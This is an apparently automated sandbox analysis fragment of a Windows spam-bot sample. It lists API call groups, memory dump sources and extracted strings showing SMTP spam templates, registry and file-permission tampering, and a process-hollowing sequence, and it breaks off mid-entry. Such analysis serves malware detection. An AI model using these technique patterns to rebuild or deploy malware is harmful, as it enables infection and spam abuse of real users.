                                                                                        • Opcode Fuzzy Hash: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
                                                                                        • Instruction Fuzzy Hash: 26615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 0040A7FB
                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
                                                                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
                                                                                        • wsprintfA.USER32 ref: 0040A8AF
                                                                                        • send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
                                                                                        • wsprintfA.USER32 ref: 0040A8E2
                                                                                        • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
                                                                                        • wsprintfA.USER32 ref: 0040A9B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$send$lstrlenrecv
                                                                                        • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                        • API String ID: 3650048968-2394369944
                                                                                        • Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                        • Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
                                                                                        • Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
                                                                                        • Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 02617A96
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02617ACD
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 02617ADF
                                                                                        • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 02617B01
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02617B1F
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02617B39
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 02617B4A
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02617B58
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02617B68
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 02617B77
                                                                                        • LocalFree.KERNEL32(00000000), ref: 02617B7E
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02617B9A
                                                                                        • GetAce.ADVAPI32(?,?,?), ref: 02617BCA
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02617BF1
                                                                                        • DeleteAce.ADVAPI32(?,?), ref: 02617C0A
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02617C2C
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 02617CB1
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02617CBF
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 02617CD0
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 02617CE0
                                                                                        • LocalFree.KERNEL32(00000000), ref: 02617CEE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                        • String ID: D
                                                                                        • API String ID: 3722657555-2746444292
                                                                                        • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                        • Instruction ID: 9e59ed8d95d15a916874d7ebc3e673ef879492c354e686dc81b426dfa18adb53
                                                                                        • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                        • Instruction Fuzzy Hash: 89813D7190021AEFDB12CFA5DD84FEEFBB8AF08304F18816AE505E6250D775A685CB64
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
                                                                                        • RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
                                                                                        • RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
                                                                                        • RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseOpenQuery
                                                                                        • String ID: PromptOnSecureDesktop$localcfg
                                                                                        • API String ID: 237177642-1678164370
                                                                                        • Opcode ID: f0e8bc001febcaf3aa79265d78dfa7c2bcbced2000b5ff9bfcb5f44e60df388c
                                                                                        • Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
                                                                                        • Opcode Fuzzy Hash: f0e8bc001febcaf3aa79265d78dfa7c2bcbced2000b5ff9bfcb5f44e60df388c
                                                                                        • Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(123.45.67.89), ref: 004019B1
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
                                                                                        • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
                                                                                        • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
                                                                                        • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
                                                                                        • HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
                                                                                        • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
                                                                                        • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                        • API String ID: 835516345-270533642
                                                                                        • Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                        • Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
                                                                                        • Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                        • Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
APIs
• RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 0261865A
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 0261867B
• RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 026186A8
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 026186B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: Value$CloseOpenQuery
• String ID: "$PromptOnSecureDesktop
• API String ID: 237177642-3108538426
APIs
• ShellExecuteExW.SHELL32(?), ref: 02611601
• lstrlenW.KERNEL32(-00000003), ref: 026117D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: ExecuteShelllstrlen
• String ID: $<$@$D
• API String ID: 1628651668-1974347203
APIs
• RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 026176D9
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 02617757
• RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 0261778F
• ___ascii_stricmp.LIBCMT ref: 026178B4
• RegCloseKey.ADVAPI32(?), ref: 0261794E
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0261796D
• RegCloseKey.ADVAPI32(?), ref: 0261797E
• RegCloseKey.ADVAPI32(?), ref: 026179AC
• RegCloseKey.ADVAPI32(?), ref: 02617A56
  • Part of subcall function 0261F40C: lstrlen.KERNEL32(000000E4,00000000,PromptOnSecureDesktop,000000E4,0261772A,?), ref: 0261F414
• GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 026179F6
• RegCloseKey.ADVAPI32(?), ref: 02617A4D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
• String ID: "$PromptOnSecureDesktop
• API String ID: 3433985886-3108538426
APIs
• RtlAllocateHeap.NTDLL(00000000), ref: 02612CED
• socket.WS2_32(00000002,00000002,00000011), ref: 02612D07
• htons.WS2_32(00000000), ref: 02612D42
• select.WS2_32 ref: 02612D8F
• recv.WS2_32(?,00000000,00001000,00000000), ref: 02612DB1
• GetProcessHeap.KERNEL32(00000000,00000108), ref: 02612E62
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: Heap$AllocateProcesshtonsrecvselectsocket
• String ID:
• API String ID: 127016686-0
APIs
• GetLocalTime.KERNEL32(?), ref: 0040AD98
• SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
  • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
  • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
  • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
  • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
  • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
  • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
• wsprintfA.USER32 ref: 0040AEA5
  • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
• wsprintfA.USER32 ref: 0040AE4F
• wsprintfA.USER32 ref: 0040AE5E
  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
• String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
• API String ID: 3631595830-1816598006
APIs
• GetModuleHandleA.KERNEL32(iphlpapi.dll,759223A0,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
• LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
• GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
• GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
• HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
• htons.WS2_32(00000035), ref: 00402E88
• inet_addr.WS2_32(?), ref: 00402E93
• gethostbyname.WS2_32(?), ref: 00402EA6
• GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
• HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
• String ID: GetNetworkParams$iphlpapi.dll
• API String ID: 929413710-2099955842
APIs
• GetVersionExA.KERNEL32(?), ref: 026195A7
• GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 026195D5
• GetModuleFileNameA.KERNEL32(00000000), ref: 026195DC
• wsprintfA.USER32 ref: 02619635
• wsprintfA.USER32 ref: 02619673
• wsprintfA.USER32 ref: 026196F4
• RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 02619758
• RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 0261978D
• RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 026197D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
• String ID: PromptOnSecureDesktop
• API String ID: 3696105349-2980165447
APIs
• lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
• lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
• lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
• lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
• lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
• lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
Strings
Memory Dump Source
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID: lstrcmpi
• String ID: 06A$46A$86A$smtp_ban$smtp_herr$smtp_retr
• API String ID: 1586166983-142018493
APIs
• wsprintfA.USER32 ref: 0040B467
  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID: lstrlen$wsprintf
• String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
• API String ID: 1220175532-2340906255
APIs
• GetVersionExA.KERNEL32 ref: 0261202D
• GetSystemInfo.KERNEL32(?), ref: 0261204F
• GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 0261206A
• GetProcAddress.KERNEL32(00000000), ref: 02612071
• GetCurrentProcess.KERNEL32(?), ref: 02612082
• GetTickCount.KERNEL32 ref: 02612230
  • Part of subcall function 02611E46: GetComputerNameA.KERNEL32(?,0000000F), ref: 02611E7C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Yara matches
Similarity
• API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
• String ID: flags_upd$hi_id$localcfg$work_srv
• API String ID: 4207808166-1391650218
APIs
• GetTickCount.KERNEL32 ref: 00402078
• GetTickCount.KERNEL32 ref: 004020D4
• GetTickCount.KERNEL32 ref: 004020DB
• GetTickCount.KERNEL32 ref: 0040212B
• GetTickCount.KERNEL32 ref: 00402132
• GetTickCount.KERNEL32 ref: 00402142
  • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,7508EA50,80000001,00000000,0040E513,?,?,?,?,000000E4), ref: 0040F089
  • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,7508EA50,80000001,00000000,0040E513,?,?,?,?,000000E4,000000C8), ref: 0040F093
  • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
  • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
  • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Yara matches
Similarity
• API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
• String ID: localcfg$net_type$rbl_bl$rbl_ip
• API String ID: 3976553417-1522128867
                                                                                        APIs
                                                                                        • htons.WS2_32(0040CA1D), ref: 0040F34D
                                                                                        • socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
                                                                                        • closesocket.WS2_32(00000000), ref: 0040F375
                                                                                         Memory Dump Source
                                                                                         • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: closesockethtonssocket
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 311057483-2401304539
                                                                                        APIs
                                                                                          • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                          • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                        • GetTickCount.KERNEL32 ref: 0040C31F
                                                                                        • GetTickCount.KERNEL32 ref: 0040C32B
                                                                                        • GetTickCount.KERNEL32 ref: 0040C363
                                                                                        • GetTickCount.KERNEL32 ref: 0040C378
                                                                                        • GetTickCount.KERNEL32 ref: 0040C44D
                                                                                        • InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0040C4E0), ref: 0040C4C1
                                                                                        • CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
                                                                                         Memory Dump Source
                                                                                         • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 1553760989-1857712256
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 02613068
                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02613078
                                                                                        • GetProcAddress.KERNEL32(00000000,00410408), ref: 02613095
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 026130B6
                                                                                        • htons.WS2_32(00000035), ref: 026130EF
                                                                                        • inet_addr.WS2_32(?), ref: 026130FA
                                                                                        • gethostbyname.WS2_32(?), ref: 0261310D
                                                                                        • HeapFree.KERNEL32(00000000), ref: 0261314D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                        • String ID: iphlpapi.dll
                                                                                        • API String ID: 2869546040-3565520932
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                        • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00402DA0
                                                                                        • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
                                                                                         Memory Dump Source
                                                                                         • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                        • String ID: DnsQuery_A$dnsapi.dll
                                                                                        • API String ID: 3560063639-3847274415
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                        • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                         Memory Dump Source
                                                                                         • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                        • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$PromptOnSecureDesktop$kernel32
                                                                                        • API String ID: 1082366364-2834986871
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,PromptOnSecureDesktop), ref: 004097B1
                                                                                        • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097EB
                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097F9
                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 00409831
                                                                                        • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040984E
                                                                                        • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040985B
                                                                                         Memory Dump Source
                                                                                         • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                        • String ID: D$PromptOnSecureDesktop
                                                                                        • API String ID: 2981417381-1403908072
                                                                                        APIs
                                                                                        • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 026167C3
                                                                                        • htonl.WS2_32(?), ref: 026167DF
                                                                                        • htonl.WS2_32(?), ref: 026167EE
                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 026168F1
                                                                                        • ExitProcess.KERNEL32 ref: 026169BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: Processhtonl$CurrentExitHugeRead
                                                                                        • String ID: except_info$localcfg
                                                                                        • API String ID: 1150517154-3605449297
                                                                                        APIs
                                                                                        • htons.WS2_32(0261CC84), ref: 0261F5B4
                                                                                        • socket.WS2_32(00000002,00000001,00000000), ref: 0261F5CE
                                                                                        • closesocket.WS2_32(00000000), ref: 0261F5DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: closesockethtonssocket
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 311057483-2401304539
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
                                                                                        • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
                                                                                        • LocalFree.KERNEL32(00000120), ref: 0040701F
                                                                                        • wsprintfA.USER32 ref: 00407036
                                                                                         Memory Dump Source
                                                                                         • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                        • String ID: /%d$|
                                                                                        • API String ID: 676856371-4124749705
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 02612FA1
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 02612FB1
                                                                                        • GetProcAddress.KERNEL32(00000000,004103F0), ref: 02612FC8
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108), ref: 02613000
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02613007
                                                                                        • lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 02613032
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                        • String ID: dnsapi.dll
                                                                                        • API String ID: 1242400761-3175542204
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\kosqarwi,02617043), ref: 02616F4E
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02616F55
                                                                                        • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02616F7B
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02616F92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                        • String ID: C:\Windows\SysWOW64\$PromptOnSecureDesktop$\\.\pipe\kosqarwi
                                                                                        • API String ID: 1082366364-2846295348
                                                                                        APIs
                                                                                         Memory Dump Source
                                                                                         • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
